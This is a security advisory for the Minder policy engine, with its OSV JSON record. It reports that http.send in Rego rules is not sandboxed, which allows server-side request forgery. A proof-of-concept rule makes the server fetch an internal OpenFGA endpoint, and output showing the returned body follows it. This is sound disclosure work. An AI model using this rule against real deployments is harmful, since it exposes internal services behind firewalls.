GHSA-6xvf-4vh9-mw47
Vulnerability from github
Impact
Minder users may fetch content in the context of the Minder server, which may include URLs which the user would not normally have access to (for example, if the Minder server is behind a firewall or other network partition).
Patches
https://github.com/mindersec/minder/commit/f770400923984649a287d7215410ef108e845af8
Workarounds
Users should avoid deploying Minder with access to sensitive resources. Unfortunately, this could include access to systems like OpenFGA or Keycloak, depending on the deployment configuration.
References
Sample ruletype:
```yaml version: v1 type: rule-type name: test-http-send display_name: Test that we can call http.send short_failure_message: Failed http.send severity: value: medium context: provider: github description: | ... guidance: | .... def: in_entity: repository rule_schema: type: object properties: {} ingest: type: git git: {} eval: type: rego violation_format: text rego: type: constraints def: | package minder
import rego.v1
violations contains {"msg": "Check-execution"}
resp := http.send({
"method": "GET",
"url": "http://openfga:8080/",
"raise_error": false,
})
violations contains {"msg": sprintf("Response: %s", [resp.status])}
details := sprintf("High score: %s", [resp.body.summary])
violations contains {"msg": sprintf("Response body: %s", [resp.body]) } if {
resp.status_code > 0
}
```
Example policy:
yaml
version: v1
type: profile
name: Test-HTTP-send
display_name: Test if we can do http.send
context:
provider: github
alert: "off"
remediate: "off"
repository:
- type: test-http-send
def: {}
Evaluation results:
sh
$ minder profile status list -n test-http-send --json
{
"profileStatus": {
"profileId": "3b3e0918-4deb-49cc-b4c9-1d1d912cf784",
"profileName": "Test-HTTP-send",
"profileStatus": "failure",
"lastUpdated": "2024-10-31T03:44:01.456359Z"
},
"ruleEvaluationStatus": [
{
"profileId": "3b3e0918-4deb-49cc-b4c9-1d1d912cf784",
"ruleId": "c0ebac2c-cfe2-4a98-b0a6-d6971209653e",
"ruleName": "test-http-send",
"entity": "repository",
"status": "failure",
"lastUpdated": "2024-10-31T03:44:01.456359Z",
"entityInfo": {
"entity_id": "a7f7a4bc-4430-4e9a-86a9-ffa026db6343",
"entity_type": "repository",
"name": "a-random-sandbox/colorls",
"provider": "github-app-a-random-sandbox",
"repo_name": "colorls",
"repo_owner": "a-random-sandbox",
"repository_id": "a7f7a4bc-4430-4e9a-86a9-ffa026db6343"
},
"details": "Multiple issues:\n* Check-execution\n* Response body: {\"code\": \"undefined_endpoint\", \"message\": \"Not Found\"}\n* Response: 404 Not Found\n",
"guidance": "....\n",
"remediationStatus": "skipped",
"remediationLastUpdated": "2024-10-31T03:44:01.456359Z",
"ruleTypeName": "test-http-send",
"ruleDescriptionName": "Test that we can call http.send",
"alert": {
"status": "skipped",
"lastUpdated": "2024-10-31T03:44:01.456359Z"
},
"ruleDisplayName": "Test that we can call http.send",
"releasePhase": "RULE_TYPE_RELEASE_PHASE_ALPHA"
}
]
}
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.0.83"
},
"package": {
"ecosystem": "Go",
"name": "github.com/mindersec/minder"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.72"
},
{
"fixed": "0.0.84"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-830"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-20T21:57:01Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nMinder users may fetch content in the context of the Minder server, which may include URLs which the user would not normally have access to (for example, if the Minder server is behind a firewall or other network partition).\n\n### Patches\n\nhttps://github.com/mindersec/minder/commit/f770400923984649a287d7215410ef108e845af8\n\n### Workarounds\n\nUsers should avoid deploying Minder with access to sensitive resources. Unfortunately, this could include access to systems like OpenFGA or Keycloak, depending on the deployment configuration.\n\n### References\n\nSample ruletype:\n\n```yaml\nversion: v1\ntype: rule-type\nname: test-http-send\ndisplay_name: Test that we can call http.send\nshort_failure_message: Failed http.send\nseverity:\n value: medium\ncontext:\n provider: github\ndescription: |\n ...\nguidance: |\n ....\ndef:\n in_entity: repository\n rule_schema:\n type: object\n properties: {}\n ingest:\n type: git\n git: {}\n eval:\n type: rego\n violation_format: text\n rego:\n type: constraints\n def: |\n package minder\n\n import rego.v1\n\n violations contains {\"msg\": \"Check-execution\"}\n\n resp := http.send({\n \"method\": \"GET\",\n \"url\": \"http://openfga:8080/\",\n \"raise_error\": false,\n })\n\n violations contains {\"msg\": sprintf(\"Response: %s\", [resp.status])}\n\n details := sprintf(\"High score: %s\", [resp.body.summary])\n\n violations contains {\"msg\": sprintf(\"Response body: %s\", [resp.body]) } if {\n resp.status_code \u003e 0\n }\n```\n\nExample policy:\n\n```yaml\nversion: v1\ntype: profile\nname: Test-HTTP-send\ndisplay_name: Test if we can do http.send\ncontext:\n provider: github\nalert: \"off\"\nremediate: \"off\"\nrepository:\n - type: test-http-send\n def: {}\n```\n\nEvaluation results:\n\n```sh\n$ minder profile status list -n test-http-send --json\n{\n \"profileStatus\": {\n \"profileId\": \"3b3e0918-4deb-49cc-b4c9-1d1d912cf784\",\n \"profileName\": \"Test-HTTP-send\",\n \"profileStatus\": \"failure\",\n \"lastUpdated\": \"2024-10-31T03:44:01.456359Z\"\n },\n \"ruleEvaluationStatus\": [\n {\n \"profileId\": \"3b3e0918-4deb-49cc-b4c9-1d1d912cf784\",\n \"ruleId\": \"c0ebac2c-cfe2-4a98-b0a6-d6971209653e\",\n \"ruleName\": \"test-http-send\",\n \"entity\": \"repository\",\n \"status\": \"failure\",\n \"lastUpdated\": \"2024-10-31T03:44:01.456359Z\",\n \"entityInfo\": {\n \"entity_id\": \"a7f7a4bc-4430-4e9a-86a9-ffa026db6343\",\n \"entity_type\": \"repository\",\n \"name\": \"a-random-sandbox/colorls\",\n \"provider\": \"github-app-a-random-sandbox\",\n \"repo_name\": \"colorls\",\n \"repo_owner\": \"a-random-sandbox\",\n \"repository_id\": \"a7f7a4bc-4430-4e9a-86a9-ffa026db6343\"\n },\n \"details\": \"Multiple issues:\\n* Check-execution\\n* Response body: {\\\"code\\\": \\\"undefined_endpoint\\\", \\\"message\\\": \\\"Not Found\\\"}\\n* Response: 404 Not Found\\n\",\n \"guidance\": \"....\\n\",\n \"remediationStatus\": \"skipped\",\n \"remediationLastUpdated\": \"2024-10-31T03:44:01.456359Z\",\n \"ruleTypeName\": \"test-http-send\",\n \"ruleDescriptionName\": \"Test that we can call http.send\",\n \"alert\": {\n \"status\": \"skipped\",\n \"lastUpdated\": \"2024-10-31T03:44:01.456359Z\"\n },\n \"ruleDisplayName\": \"Test that we can call http.send\",\n \"releasePhase\": \"RULE_TYPE_RELEASE_PHASE_ALPHA\"\n }\n ]\n}\n```",
"id": "GHSA-6xvf-4vh9-mw47",
"modified": "2025-11-20T21:57:01Z",
"published": "2025-11-20T21:57:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mindersec/minder/security/advisories/GHSA-6xvf-4vh9-mw47"
},
{
"type": "WEB",
"url": "https://github.com/mindersec/minder/commit/f770400923984649a287d7215410ef108e845af8"
},
{
"type": "PACKAGE",
"url": "https://github.com/mindersec/minder"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L",
"type": "CVSS_V4"
}
],
"summary": "Minder does not sandbox http.send in Rego programs"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.